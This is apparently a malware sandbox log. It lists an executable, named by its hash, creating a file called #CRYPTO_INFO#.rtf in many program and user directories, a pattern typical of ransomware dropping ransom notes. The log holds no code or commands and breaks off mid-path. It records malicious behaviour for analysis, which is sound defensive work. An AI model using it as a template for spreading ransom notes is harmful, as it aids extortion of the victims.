8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_66_x64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280809\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\as-IN\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Extras\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\w0w630d3.default-release\cache2\entries\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\plugins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Music\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\fonts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 